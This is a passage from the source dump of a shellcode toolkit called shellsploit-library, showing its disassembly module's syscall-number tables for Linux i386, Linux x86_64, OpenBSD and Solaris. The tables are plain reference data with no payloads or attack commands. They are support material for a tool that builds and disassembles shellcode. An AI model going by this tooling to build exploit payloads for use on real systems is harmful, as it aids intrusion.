47 | "sync":"36", 48 | "kill":"37", 49 | "rename":"38", 50 | "mkdir":"39", 51 | "rmdir":"40", 52 | "dup":"41", 53 | "pipe":"42", 54 | "times":"43", 55 | "prof":"44", 56 | "brk":"45", 57 | "setgid":"46", 58 | "getgid":"47", 59 | "signal":"48", 60 | "geteuid":"49", 61 | "getegid":"50", 62 | "acct":"51", 63 | "umount2":"52", 64 | "lock":"53", 65 | "ioctl":"54", 66 | "fcntl":"55", 67 | "mpx":"56", 68 | "setpgid":"57", 69 | "ulimit":"58", 70 | "oldolduname":"59", 71 | "umask":"60", 72 | "chroot":"61", 73 | "ustat":"62", 74 | "dup2":"63", 75 | "getppid":"64", 76 | "getpgrp":"65", 77 | "setsid":"66", 78 | "sigaction":"67", 79 | "sgetmask":"68", 80 | "ssetmask":"69", 81 | "setreuid":"70", 82 | "setregid":"71", 83 | "sigsuspend":"72", 84 | "sigpending":"73", 85 | "sethostname":"74", 86 | "setrlimit":"75", 87 | "getrlimit":"76", 88 | "getrusage":"77", 89 | "gettimeofday":"78", 90 | "settimeofday":"79", 91 | "getgroups":"80", 92 | "setgroups":"81", 93 | "select":"82", 94 | "symlink":"83", 95 | "oldlstat":"84", 96 | "readlink":"85", 97 | "uselib":"86", 98 | "swapon":"87", 99 | "reboot":"88", 100 | "readdir":"89", 101 | "mmap":"90", 102 | "munmap":"91", 103 | "truncate":"92", 104 | "ftruncate":"93", 105 | "fchmod":"94", 106 | "fchown":"95", 107 | "getpriority":"96", 108 | "setpriority":"97", 109 | "profil":"98", 110 | "statfs":"99", 111 | "fstatfs":"100", 112 | "ioperm":"101", 113 | "socketcall":"102", 114 | "syslog":"103", 115 | "setitimer":"104", 116 | "getitimer":"105", 117 | "stat":"106", 118 | "lstat":"107", 119 | "fstat":"108", 120 | "olduname":"109", 121 | "iopl":"110", 122 | "vhangup":"111", 123 | "idle":"112", 124 | "vm86old":"113", 125 | "wait4":"114", 126 | "swapoff":"115", 127 | "sysinfo":"116", 128 | "ipc":"117", 129 | "fsync":"118", 130 | "sigreturn":"119", 131 | "clone":"120", 132 | "setdomainname":"121", 133 | "uname":"122", 134 | "modify_ldt":"123", 135 | "adjtimex":"124", 136 | "mprotect":"125", 137 | "sigprocmask":"126", 138 | "create_module":"127", 139 | "init_module":"128", 140 | "delete_module":"129", 141 | "get_kernel_syms":"130", 142 | "quotactl":"131", 143 | "getpgid":"132", 144 | "fchdir":"133", 145 | "bdflush":"134", 146 | "sysfs":"135", 147 | "personality":"136", 148 | "afs_syscall":"137", 149 | "setfsuid":"138", 150 | "setfsgid":"139", 151 | "_llseek":"140", 152 | "getdents":"141", 153 | "_newselect":"142", 154 | "flock":"143", 155 | "msync":"144", 156 | "readv":"145", 157 | "writev":"146", 158 | "getsid":"147", 159 | "fdatasync":"148", 160 | "_sysctl":"149", 161 | "mlock":"150", 162 | "munlock":"151", 163 | "mlockall":"152", 164 | "munlockall":"153", 165 | "sched_setparam":"154", 166 | "sched_getparam":"155", 167 | "sched_setscheduler":"156", 168 | "sched_getscheduler":"157", 169 | "sched_yield":"158", 170 | "sched_get_priority_max":"159", 171 | "sched_get_priority_min":"160", 172 | "sched_rr_get_interval":"161", 173 | "nanosleep":"162", 174 | "mremap":"163", 175 | "setresuid":"164", 176 | "getresuid":"165", 177 | "vm86":"166", 178 | "query_module":"167", 179 | "poll":"168", 180 | "nfsservctl":"169", 181 | "setresgid":"170", 182 | "getresgid":"171", 183 | "prctl":"172", 184 | "rt_sigreturn":"173", 185 | "rt_sigaction":"174", 186 | "rt_sigprocmask":"175", 187 | "rt_sigpending":"176", 188 | "rt_sigtimedwait":"177", 189 | "rt_sigqueueinfo":"178", 190 | "rt_sigsuspend":"179", 191 | "pread64":"180", 192 | "pwrite64":"181", 193 | "chown":"182", 194 | "getcwd":"183", 195 | "capget":"184", 196 | "capset":"185", 197 | "sigaltstack":"186", 198 | "sendfile":"187", 199 | "getpmsg":"188", 200 | "putpmsg":"189", 201 | "vfork":"190", 202 | "ugetrlimit":"191", 203 | "mmap2":"192", 204 | "truncate64":"193", 205 | "ftruncate64":"194", 206 | "stat64":"195", 207 | "lstat64":"196", 208 | "fstat64":"197", 209 | "lchown32":"198", 210 | "getuid32":"199", 211 | "getgid32":"200", 212 | "geteuid32":"201", 213 | "getegid32":"202", 214 | "setreuid32":"203", 215 | "setregid32":"204", 216 | "getgroups32":"205", 217 | "setgroups32":"206", 218 | "fchown32":"207", 219 | "setresuid32":"208", 220 | "getresuid32":"209", 221 | "setresgid32":"210", 222 | "getresgid32":"211", 223 | "chown32":"212", 224 | "setuid32":"213", 225 | "setgid32":"214", 226 | "setfsuid32":"215", 227 | "setfsgid32":"216", 228 | "pivot_root":"217", 229 | "mincore":"218", 230 | "madvise":"219", 231 | "getdents64":"220", 232 | "fcntl64":"221", 233 | "gettid":"224", 234 | "readahead":"225", 235 | "setxattr":"226", 236 | "lsetxattr":"227", 237 | "fsetxattr":"228", 238 | "getxattr":"229", 239 | "lgetxattr":"230", 240 | "fgetxattr":"231", 241 | "listxattr":"232", 242 | "llistxattr":"233", 243 | "flistxattr":"234", 244 | "removexattr":"235", 245 | "lremovexattr":"236", 246 | "fremovexattr":"237", 247 | "tkill":"238", 248 | "sendfile64":"239", 249 | "futex":"240", 250 | "sched_setaffinity":"241", 251 | "sched_getaffinity":"242", 252 | "set_thread_area":"243", 253 | "get_thread_area":"244", 254 | "io_setup":"245", 255 | "io_destroy":"246", 256 | "io_getevents":"247", 257 | "io_submit":"248", 258 | "io_cancel":"249", 259 | "fadvise64":"250", 260 | "exit_group":"252", 261 | "lookup_dcookie":"253", 262 | "epoll_create":"254", 263 | "epoll_ctl":"255", 264 | "epoll_wait":"256", 265 | "remap_file_pages":"257", 266 | "set_tid_address":"258", 267 | "timer_create":"259", 268 | "timer_settime":"260", 269 | "timer_gettime":"261", 270 | "timer_getoverrun":"262", 271 | "timer_delete":"263", 272 | "clock_settime":"264", 273 | "clock_gettime":"265", 274 | "clock_getres":"266", 275 | "clock_nanosleep":"267", 276 | "statfs64":"268", 277 | "fstatfs64":"269", 278 | "tgkill":"270", 279 | "utimes":"271", 280 | "fadvise64_64":"272", 281 | "vserver":"273", 282 | "mbind":"274", 283 | "get_mempolicy":"275", 284 | "set_mempolicy":"276", 285 | "mq_open":"277", 286 | "mq_unlink":"278", 287 | "mq_timedsend":"279", 288 | "mq_timedreceive":"280", 289 | "mq_notify":"281", 290 | "mq_getsetattr":"282", 291 | "kexec_load":"283", 292 | "waitid":"284", 293 | "add_key":"286", 294 | "request_key":"287", 295 | "keyctl":"288", 296 | "ioprio_set":"289", 297 | "ioprio_get":"290", 298 | "inotify_init":"291", 299 | "inotify_add_watch":"292", 300 | "inotify_rm_watch":"293", 301 | "migrate_pages":"294", 302 | "openat":"295", 303 | "mkdirat":"296", 304 | "mknodat":"297", 305 | "fchownat":"298", 306 | "futimesat":"299", 307 | "fstatat64":"300", 308 | "unlinkat":"301", 309 | "renameat":"302", 310 | "linkat":"303", 311 | "symlinkat":"304", 312 | "readlinkat":"305", 313 | "fchmodat":"306", 314 | "faccessat":"307", 315 | "pselect6":"308", 316 | "ppoll":"309", 317 | "unshare":"310", 318 | "set_robust_list":"311", 319 | "get_robust_list":"312", 320 | "splice":"313", 321 | "sync_file_range":"314", 322 | "tee":"315", 323 | "vmsplice":"316", 324 | "move_pages":"317", 325 | "getcpu":"318", 326 | "epoll_pwait":"319", 327 | "utimensat":"320", 328 | "signalfd":"321", 329 | "timerfd_create":"322", 330 | "eventfd":"323", 331 | "fallocate":"324", 332 | "timerfd_settime":"325", 333 | "timerfd_gettime":"326", 334 | "signalfd4":"327", 335 | "eventfd2":"328", 336 | "epoll_create1":"329", 337 | "dup3":"330", 338 | "pipe2":"331", 339 | "inotify_init1":"332", 340 | "preadv":"333", 341 | "pwritev":"334", 342 | "rt_tgsigqueueinfo":"335", 343 | "perf_event_open":"336", 344 | "recvmmsg":"337", 345 | "fanotify_init":"338", 346 | "fanotify_mark":"339", 347 | "prlimit64":"340", 348 | "name_to_handle_at":"341", 349 | "open_by_handle_at":"342", 350 | "clock_adjtime":"343", 351 | "syncfs":"344", 352 | "sendmmsg":"345", 353 | "setns":"346", 354 | "process_vm_readv":"347", 355 | "process_vm_writev":"348", 356 | "kcmp":"349", 357 | "finit_module":"350", 358 | "sched_setattr":"351", 359 | "sched_getattr":"352", 360 | "renameat2":"353", 361 | "seccomp":"354", 362 | "getrandom":"355", 363 | "memfd_create":"356", 364 | "bpf":"357", 365 | "execveat":"358" 366 | } 367 | 368 | for key in list.keys(): 369 | if list[key] == sys: 370 | return key 371 | 372 | #print i386call( str(int("b",16))) 373 | 374 | #print i386Systemcall( str(int("b",16))) 375 | 376 | -------------------------------------------------------------------------------- /shellsploit/disassembly/Syscalls/linux_64.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | list = { 10 | "read":"0", 11 | "write":"1", 12 | "open":"2", 13 | "close":"3", 14 | "stat":"4", 15 | "fstat":"5", 16 | "lstat":"6", 17 | "poll":"7", 18 | "lseek":"8", 19 | "mmap":"9", 20 | "mprotect":"10", 21 | "munmap":"11", 22 | "brk":"12", 23 | "rt_sigaction":"13", 24 | "rt_sigprocmask":"14", 25 | "rt_sigreturn":"15", 26 | "ioctl":"16", 27 | "pread64":"17", 28 | "pwrite64":"18", 29 | "readv":"19", 30 | "writev":"20", 31 | "access":"21", 32 | "pipe":"22", 33 | "select":"23", 34 | "sched_yield":"24", 35 | "mremap":"25", 36 | "msync":"26", 37 | "mincore":"27", 38 | "madvise":"28", 39 | "shmget":"29", 40 | "shmat":"30", 41 | "shmctl":"31", 42 | "dup":"32", 43 | "dup2":"33", 44 | "pause":"34", 45 | "nanosleep":"35", 46 | "getitimer":"36", 47 | "alarm":"37", 48 | "setitimer":"38", 49 | "getpid":"39", 50 | "sendfile":"40", 51 | "socket":"41", 52 | "connect":"42", 53 | "accept":"43", 54 | "sendto":"44", 55 | "recvfrom":"45", 56 | "sendmsg":"46", 57 | "recvmsg":"47", 58 | "shutdown":"48", 59 | "bind":"49", 60 | "listen":"50", 61 | "getsockname":"51", 62 | "getpeername":"52", 63 | "socketpair":"53", 64 | "setsockopt":"54", 65 | "getsockopt":"55", 66 | "clone":"56", 67 | "fork":"57", 68 | "vfork":"58", 69 | "execve":"59", 70 | "exit":"60", 71 | "wait4":"61", 72 | "kill":"62", 73 | "uname":"63", 74 | "semget":"64", 75 | "semop":"65", 76 | "semctl":"66", 77 | "shmdt":"67", 78 | "msgget":"68", 79 | "msgsnd":"69", 80 | "msgrcv":"70", 81 | "msgctl":"71", 82 | "fcntl":"72", 83 | "flock":"73", 84 | "fsync":"74", 85 | "fdatasync":"75", 86 | "truncate":"76", 87 | "ftruncate":"77", 88 | "getdents":"78", 89 | "getcwd":"79", 90 | "chdir":"80", 91 | "fchdir":"81", 92 | "rename":"82", 93 | "mkdir":"83", 94 | "rmdir":"84", 95 | "creat":"85", 96 | "link":"86", 97 | "unlink":"87", 98 | "symlink":"88", 99 | "readlink":"89", 100 | "chmod":"90", 101 | "fchmod":"91", 102 | "chown":"92", 103 | "fchown":"93", 104 | "lchown":"94", 105 | "umask":"95", 106 | "gettimeofday":"96", 107 | "getrlimit":"97", 108 | "getrusage":"98", 109 | "sysinfo":"99", 110 | "times":"100", 111 | "ptrace":"101", 112 | "getuid":"102", 113 | "syslog":"103", 114 | "getgid":"104", 115 | "setuid":"105", 116 | "setgid":"106", 117 | "geteuid":"107", 118 | "getegid":"108", 119 | "setpgid":"109", 120 | "getppid":"110", 121 | "getpgrp":"111", 122 | "setsid":"112", 123 | "setreuid":"113", 124 | "setregid":"114", 125 | "getgroups":"115", 126 | "setgroups":"116", 127 | "setresuid":"117", 128 | "getresuid":"118", 129 | "setresgid":"119", 130 | "getresgid":"120", 131 | "getpgid":"121", 132 | "setfsuid":"122", 133 | "setfsgid":"123", 134 | "getsid":"124", 135 | "capget":"125", 136 | "capset":"126", 137 | "rt_sigpending":"127", 138 | "rt_sigtimedwait":"128", 139 | "rt_sigqueueinfo":"129", 140 | "rt_sigsuspend":"130", 141 | "sigaltstack":"131", 142 | "utime":"132", 143 | "mknod":"133", 144 | "uselib":"134", 145 | "personality":"135", 146 | "ustat":"136", 147 | "statfs":"137", 148 | "fstatfs":"138", 149 | "sysfs":"139", 150 | "getpriority":"140", 151 | "setpriority":"141", 152 | "sched_setparam":"142", 153 | "sched_getparam":"143", 154 | "sched_setscheduler":"144", 155 | "sched_getscheduler":"145", 156 | "sched_get_priority_max":"146", 157 | "sched_get_priority_min":"147", 158 | "sched_rr_get_interval":"148", 159 | "mlock":"149", 160 | "munlock":"150", 161 | "mlockall":"151", 162 | "munlockall":"152", 163 | "vhangup":"153", 164 | "modify_ldt":"154", 165 | "pivot_root":"155", 166 | "_sysctl":"156", 167 | "prctl":"157", 168 | "arch_prctl":"158", 169 | "adjtimex":"159", 170 | "setrlimit":"160", 171 | "chroot":"161", 172 | "sync":"162", 173 | "acct":"163", 174 | "settimeofday":"164", 175 | "mount":"165", 176 | "umount2":"166", 177 | "swapon":"167", 178 | "swapoff":"168", 179 | "reboot":"169", 180 | "sethostname":"170", 181 | "setdomainname":"171", 182 | "iopl":"172", 183 | "ioperm":"173", 184 | "create_module":"174", 185 | "init_module":"175", 186 | "delete_module":"176", 187 | "get_kernel_syms":"177", 188 | "query_module":"178", 189 | "quotactl":"179", 190 | "nfsservctl":"180", 191 | "getpmsg":"181", 192 | "putpmsg":"182", 193 | "afs_syscall":"183", 194 | "tuxcall":"184", 195 | "security":"185", 196 | "gettid":"186", 197 | "readahead":"187", 198 | "setxattr":"188", 199 | "lsetxattr":"189", 200 | "fsetxattr":"190", 201 | "getxattr":"191", 202 | "lgetxattr":"192", 203 | "fgetxattr":"193", 204 | "listxattr":"194", 205 | "llistxattr":"195", 206 | "flistxattr":"196", 207 | "removexattr":"197", 208 | "lremovexattr":"198", 209 | "fremovexattr":"199", 210 | "tkill":"200", 211 | "time":"201", 212 | "futex":"202", 213 | "sched_setaffinity":"203", 214 | "sched_getaffinity":"204", 215 | "set_thread_area":"205", 216 | "io_setup":"206", 217 | "io_destroy":"207", 218 | "io_getevents":"208", 219 | "io_submit":"209", 220 | "io_cancel":"210", 221 | "get_thread_area":"211", 222 | "lookup_dcookie":"212", 223 | "epoll_create":"213", 224 | "epoll_ctl_old":"214", 225 | "epoll_wait_old":"215", 226 | "remap_file_pages":"216", 227 | "getdents64":"217", 228 | "set_tid_address":"218", 229 | "restart_syscall":"219", 230 | "semtimedop":"220", 231 | "fadvise64":"221", 232 | "timer_create":"222", 233 | "timer_settime":"223", 234 | "timer_gettime":"224", 235 | "timer_getoverrun":"225", 236 | "timer_delete":"226", 237 | "clock_settime":"227", 238 | "clock_gettime":"228", 239 | "clock_getres":"229", 240 | "clock_nanosleep":"230", 241 | "exit_group":"231", 242 | "epoll_wait":"232", 243 | "epoll_ctl":"233", 244 | "tgkill":"234", 245 | "utimes":"235", 246 | "vserver":"236", 247 | "mbind":"237", 248 | "set_mempolicy":"238", 249 | "get_mempolicy":"239", 250 | "mq_open":"240", 251 | "mq_unlink":"241", 252 | "mq_timedsend":"242", 253 | "mq_timedreceive":"243", 254 | "mq_notify":"244", 255 | "mq_getsetattr":"245", 256 | "kexec_load":"246", 257 | "waitid":"247", 258 | "add_key":"248", 259 | "request_key":"249", 260 | "keyctl":"250", 261 | "ioprio_set":"251", 262 | "ioprio_get":"252", 263 | "inotify_init":"253", 264 | "inotify_add_watch":"254", 265 | "inotify_rm_watch":"255", 266 | "migrate_pages":"256", 267 | "openat":"257", 268 | "mkdirat":"258", 269 | "mknodat":"259", 270 | "fchownat":"260", 271 | "futimesat":"261", 272 | "newfstatat":"262", 273 | "unlinkat":"263", 274 | "renameat":"264", 275 | "linkat":"265", 276 | "symlinkat":"266", 277 | "readlinkat":"267", 278 | "fchmodat":"268", 279 | "faccessat":"269", 280 | "pselect6":"270", 281 | "ppoll":"271", 282 | "unshare":"272", 283 | "set_robust_list":"273", 284 | "get_robust_list":"274", 285 | "splice":"275", 286 | "tee":"276", 287 | "sync_file_range":"277", 288 | "vmsplice":"278", 289 | "move_pages":"279", 290 | "utimensat":"280", 291 | "epoll_pwait":"281", 292 | "signalfd":"282", 293 | "timerfd_create":"283", 294 | "eventfd":"284", 295 | "fallocate":"285", 296 | "timerfd_settime":"286", 297 | "timerfd_gettime":"287", 298 | "accept4":"288", 299 | "signalfd4":"289", 300 | "eventfd2":"290", 301 | "epoll_create1":"291", 302 | "dup3":"292", 303 | "pipe2":"293", 304 | "inotify_init1":"294", 305 | "preadv":"295", 306 | "pwritev":"296", 307 | "rt_tgsigqueueinfo":"297", 308 | "perf_event_open":"298", 309 | "recvmmsg":"299", 310 | "fanotify_init":"300", 311 | "fanotify_mark":"301", 312 | "prlimit64":"302", 313 | "name_to_handle_at":"303", 314 | "open_by_handle_at":"304", 315 | "clock_adjtime":"305", 316 | "syncfs":"306", 317 | "sendmmsg":"307", 318 | "setns":"308", 319 | "getcpu":"309", 320 | "process_vm_readv":"310", 321 | "process_vm_writev":"311", 322 | "kcmp":"312", 323 | "finit_module":"313", 324 | "sched_setattr":"314", 325 | "sched_getattr":"315", 326 | "renameat2":"316", 327 | "seccomp":"317", 328 | "getrandom":"318", 329 | "memfd_create":"319", 330 | "kexec_file_load":"320", 331 | "bpf":"321", 332 | "execveat":"322" 333 | } 334 | 335 | #print list["execve"] 336 | -------------------------------------------------------------------------------- /shellsploit/disassembly/Syscalls/openbsd_32.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | list = { 10 | "syscall":"0", 11 | "exit":"1", 12 | "fork":"2", 13 | "read":"3", 14 | "write":"4", 15 | "open":"5", 16 | "close":"6", 17 | "wait4":"7", 18 | "link":"9", 19 | "unlink":"10", 20 | "chdir":"12", 21 | "fchdir":"13", 22 | "mknod":"14", 23 | "chmod":"15", 24 | "chown":"16", 25 | "break":"17", 26 | "getpid":"20", 27 | "mount":"21", 28 | "unmount":"22", 29 | "setuid":"23", 30 | "getuid":"24", 31 | "geteuid":"25", 32 | "ptrace":"26", 33 | "recvmsg":"27", 34 | "sendmsg":"28", 35 | "recvfrom":"29", 36 | "accept":"30", 37 | "getpeername":"31", 38 | "getsockname":"32", 39 | "access":"33", 40 | "chflags":"34", 41 | "fchflags":"35", 42 | "sync":"36", 43 | "kill":"37", 44 | "getppid":"39", 45 | "dup":"41", 46 | "opipe":"42", 47 | "getegid":"43", 48 | "profil":"44", 49 | "ktrace":"45", 50 | "sigaction":"46", 51 | "getgid":"47", 52 | "sigprocmask":"48", 53 | "getlogin":"49", 54 | "setlogin":"50", 55 | "acct":"51", 56 | "sigpending":"52", 57 | "osigaltstack":"53", 58 | "ioctl":"54", 59 | "reboot":"55", 60 | "revoke":"56", 61 | "symlink":"57", 62 | "readlink":"58", 63 | "execve":"59", 64 | "umask":"60", 65 | "chroot":"61", 66 | "vfork":"66", 67 | "sbrk":"69", 68 | "sstk":"70", 69 | "vadvise":"72", 70 | "munmap":"73", 71 | "mprotect":"74", 72 | "madvise":"75", 73 | "mincore":"78", 74 | "getgroups":"79", 75 | "setgroups":"80", 76 | "getpgrp":"81", 77 | "setpgid":"82", 78 | "setitimer":"83", 79 | "getitimer":"86", 80 | "dup2":"90", 81 | "fcntl":"92", 82 | "select":"93", 83 | "fsync":"95", 84 | "setpriority":"96", 85 | "socket":"97", 86 | "connect":"98", 87 | "getpriority":"100", 88 | "sigreturn":"103", 89 | "bind":"104", 90 | "setsockopt":"105", 91 | "listen":"106", 92 | "sigsuspend":"111", 93 | "gettimeofday":"116", 94 | "getrusage":"117", 95 | "getsockopt":"118", 96 | "readv":"120", 97 | "writev":"121", 98 | "settimeofday":"122", 99 | "fchown":"123", 100 | "fchmod":"124", 101 | "setreuid":"126", 102 | "setregid":"127", 103 | "rename":"128", 104 | "flock":"131", 105 | "mkfifo":"132", 106 | "sendto":"133", 107 | "shutdown":"134", 108 | "socketpair":"135", 109 | "mkdir":"136", 110 | "rmdir":"137", 111 | "utimes":"138", 112 | "adjtime":"140", 113 | "setsid":"147", 114 | "quotactl":"148", 115 | "nfssvc":"155", 116 | "getfh":"161", 117 | "sysarch":"165", 118 | "pread":"173", 119 | "pwrite":"174", 120 | "setgid":"181", 121 | "setegid":"182", 122 | "seteuid":"183", 123 | "lfs_bmapv":"184", 124 | "lfs_markv":"185", 125 | "lfs_segclean":"186", 126 | "lfs_segwait":"187", 127 | "pathconf":"191", 128 | "fpathconf":"192", 129 | "swapctl":"193", 130 | "getrlimit":"194", 131 | "setrlimit":"195", 132 | "getdirentries":"196", 133 | "mmap":"197", 134 | "syscall":"198", 135 | "lseek":"199", 136 | "truncate":"200", 137 | "ftruncate":"201", 138 | "sysctl":"202", 139 | "mlock":"203", 140 | "munlock":"204", 141 | "futimes":"206", 142 | "getpgid":"207", 143 | "xfspioctl":"208", 144 | "semget":"221", 145 | "msgget":"225", 146 | "msgsnd":"226", 147 | "msgrcv":"227", 148 | "shmat":"228", 149 | "shmdt":"230", 150 | "clock_gettime":"232", 151 | "clock_settime":"233", 152 | "clock_getres":"234", 153 | "nanosleep":"240", 154 | "minherit":"250", 155 | "rfork":"251", 156 | "poll":"252", 157 | "issetugid":"253", 158 | "lchown":"254", 159 | "getsid":"255", 160 | "msync":"256", 161 | "getfsstat":"260", 162 | "statfs":"261", 163 | "fstatfs":"262", 164 | "pipe":"263", 165 | "fhopen":"264", 166 | "fhstatfs":"266", 167 | "preadv":"267", 168 | "pwritev":"268", 169 | "kqueue":"269", 170 | "kevent":"270", 171 | "mlockall":"271", 172 | "munlockall":"272", 173 | "getpeereid":"273", 174 | "getresuid":"281", 175 | "setresuid":"282", 176 | "getresgid":"283", 177 | "setresgid":"284", 178 | "mquery":"286", 179 | "closefrom":"287", 180 | "sigaltstack":"288", 181 | "shmget":"289", 182 | "semop":"290", 183 | "stat":"291", 184 | "fstat":"292", 185 | "lstat":"293", 186 | "fhstat":"294", 187 | "semctl":"295", 188 | "shmctl":"296", 189 | "msgctl":"297", 190 | "sched_yield":"298", 191 | "getthrid":"299", 192 | "thrsleep":"300", 193 | "thrwakeup":"301", 194 | "threxit":"302", 195 | "thrsigdivert":"303", 196 | "getcwd":"304", 197 | "adjfreq":"305", 198 | "MAXSYSCALL":"306", 199 | 200 | } 201 | 202 | #print list["execve"] 203 | #syscalls.master 204 | -------------------------------------------------------------------------------- /shellsploit/disassembly/Syscalls/solaris_32.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | def SolarisSystemcall( sys, key=None): 10 | list = { 11 | "syscall":"0", 12 | "exit":"1", 13 | "forkall":"2", 14 | "read":"3", 15 | "write":"4", 16 | "open":"5", 17 | "close":"6", 18 | "wait":"7", 19 | "creat":"8", 20 | "link":"9", 21 | "unlink":"10", 22 | "exec":"11", 23 | "chdir":"12", 24 | "time":"13", 25 | "mknod":"14", 26 | "chmod":"15", 27 | "chown":"16", 28 | "brk":"17", 29 | "stat":"18", 30 | "lseek":"19", 31 | "getpid":"20", 32 | "mount":"21", 33 | "umount":"22", 34 | "setuid":"23", 35 | "getuid":"24", 36 | "stime":"25", 37 | "pcsample":"26", 38 | "alarm":"27", 39 | "fstat":"28", 40 | "pause":"29", 41 | "utime":"30", 42 | "stty":"31", 43 | "gtty":"32", 44 | "access":"33", 45 | "nice":"34", 46 | "statfs":"35", 47 | "sync":"36", 48 | "kill":"37", 49 | "fstatfs":"38", 50 | "pgrpsys":"39", 51 | "uucopystr":"40", 52 | "dup":"41", 53 | "pipe":"42", 54 | "times":"43", 55 | "profil":"44", 56 | "plock":"45", 57 | "setgid":"46", 58 | "getgid":"47", 59 | "signal":"48", 60 | "msgsys":"49", 61 | "sysi86":"50", 62 | "acct":"51", 63 | "shmsys":"52", 64 | "semsys":"53", 65 | "ioctl":"54", 66 | "uadmin":"55", 67 | "utssys":"57", 68 | "fdsync":"58", 69 | "execve":"59", 70 | "umask":"60", 71 | "chroot":"61", 72 | "fcntl":"62", 73 | "ulimit":"63", 74 | "reserved_64":"64", 75 | "reserved_65":"65", 76 | "reserved_66":"66", 77 | "reserved_67":"67", 78 | "reserved_68":"68", 79 | "reserved_69":"69", 80 | "tasksys":"70", 81 | "acctctl":"71", 82 | "exacctsys":"72", 83 | "getpagesizes":"73", 84 | "rctlsys":"74", 85 | "sidsys":"75", 86 | "fsat":"76", 87 | "lwp_park":"77", 88 | "sendfilev":"78", 89 | "rmdir":"79", 90 | "mkdir":"80", 91 | "getdents":"81", 92 | "privsys":"82", 93 | "ucredsys":"83", 94 | "sysfs":"84", 95 | "getmsg":"85", 96 | "putmsg":"86", 97 | "poll":"87", 98 | "lstat":"88", 99 | "symlink":"89", 100 | "readlink":"90", 101 | "setgroups":"91", 102 | "getgroups":"92", 103 | "fchmod":"93", 104 | "fchown":"94", 105 | "sigprocmask":"95", 106 | "sigsuspend":"96", 107 | "sigaltstack":"97", 108 | "sigaction":"98", 109 | "sigpending":"99", 110 | "context":"100", 111 | "evsys":"101", 112 | "evtrapret":"102", 113 | "statvfs":"103", 114 | "fstatvfs":"104", 115 | "getloadavg":"105", 116 | "nfssys":"106", 117 | "waitid":"107", 118 | "waitsys":"SYS_waitid", 119 | "sigsendsys":"108", 120 | "hrtsys":"109", 121 | "sigresend":"111", 122 | "priocntlsys":"112", 123 | "pathconf":"113", 124 | "mincore":"114", 125 | "mmap":"115", 126 | "mprotect":"116", 127 | "munmap":"117", 128 | "fpathconf":"118", 129 | "vfork":"119", 130 | "fchdir":"120", 131 | "readv":"121", 132 | "writev":"122", 133 | "xstat":"123", 134 | "lxstat":"124", 135 | "fxstat":"125", 136 | "xmknod":"126", 137 | "setrlimit":"128", 138 | "getrlimit":"129", 139 | "lchown":"130", 140 | "memcntl":"131", 141 | "getpmsg":"132", 142 | "putpmsg":"133", 143 | "rename":"134", 144 | "uname":"135", 145 | "setegid":"136", 146 | "sysconfig":"137", 147 | "adjtime":"138", 148 | "systeminfo":"139", 149 | "sharefs":"140", 150 | "seteuid":"141", 151 | "forksys":"142", 152 | "fork1":"143", 153 | "sigtimedwait":"144", 154 | "lwp_info":"145", 155 | "yield":"146", 156 | "lwp_sema_wait":"147", 157 | "lwp_sema_post":"148", 158 | "lwp_sema_trywait":"149", 159 | "lwp_detach":"150", 160 | "corectl":"151", 161 | "modctl":"152", 162 | "fchroot":"153", 163 | "utimes":"154", 164 | "vhangup":"155", 165 | "gettimeofday":"156", 166 | "getitimer":"157", 167 | "setitimer":"158", 168 | "lwp_create":"159", 169 | "lwp_exit":"160", 170 | "lwp_suspend":"161", 171 | "lwp_continue":"162", 172 | "lwp_kill":"163", 173 | "lwp_self":"164", 174 | "lwp_sigmask":"165", 175 | "lwp_private":"166", 176 | "lwp_wait":"167", 177 | "lwp_mutex_wakeup":"168", 178 | "lwp_mutex_lock":"169", 179 | "lwp_cond_wait":"170", 180 | "lwp_cond_signal":"171", 181 | "lwp_cond_broadcast":"172", 182 | "pread":"173", 183 | "pwrite":"174", 184 | "llseek":"175", 185 | "inst_sync":"176", 186 | "brand":"177", 187 | "kaio":"178", 188 | "cpc":"", 189 | "lgrpsys":"180", 190 | "meminfosys":"SYS_lgrpsys", 191 | "rusagesys":"181", 192 | "port":"182", 193 | "pollsys":"183", 194 | "labelsys":"184", 195 | "acl":"", 196 | "auditsys":"186", 197 | "processor_bind":"187", 198 | "processor_info":"188", 199 | "p_online":"189", 200 | "sigqueue":"190", 201 | "clock_gettime":"191", 202 | "clock_settime":"192", 203 | "clock_getres":"193", 204 | "timer_create":"194", 205 | "timer_delete":"195", 206 | "timer_settime":"196", 207 | "timer_gettime":"197", 208 | "timer_getoverrun":"198", 209 | "nanosleep":"199", 210 | "facl":"200", 211 | "door":"201", 212 | "setreuid":"202", 213 | "setregid":"203", 214 | "install_utrap":"204", 215 | "signotify":"205", 216 | "schedctl":"206", 217 | "pset":"207", 218 | "sparc_utrap_install":"208", 219 | "resolvepath":"209", 220 | "lwp_mutex_timedlock":"210", 221 | "lwp_sema_timedwait":"211", 222 | "lwp_rwlock_sys":"212", 223 | "getdents64":"213", 224 | "mmap64":"214", 225 | "stat64":"215", 226 | "lstat64":"216", 227 | "fstat64":"217", 228 | "statvfs64":"218", 229 | "fstatvfs64":"219", 230 | "setrlimit64":"220", 231 | "getrlimit64":"221", 232 | "pread64":"222", 233 | "pwrite64":"223", 234 | "creat64":"224", 235 | "open64":"225", 236 | "rpcsys":"226", 237 | "zone":"227", 238 | "autofssys":"228", 239 | "getcwd":"229", 240 | "so_socket":"230", 241 | "so_socketpair":"231", 242 | "bind":"232", 243 | "listen":"233", 244 | "accept":"234", 245 | "connect":"235", 246 | "shutdown":"236", 247 | "recv":"237", 248 | "recvfrom":"238", 249 | "recvmsg":"239", 250 | "send":"240", 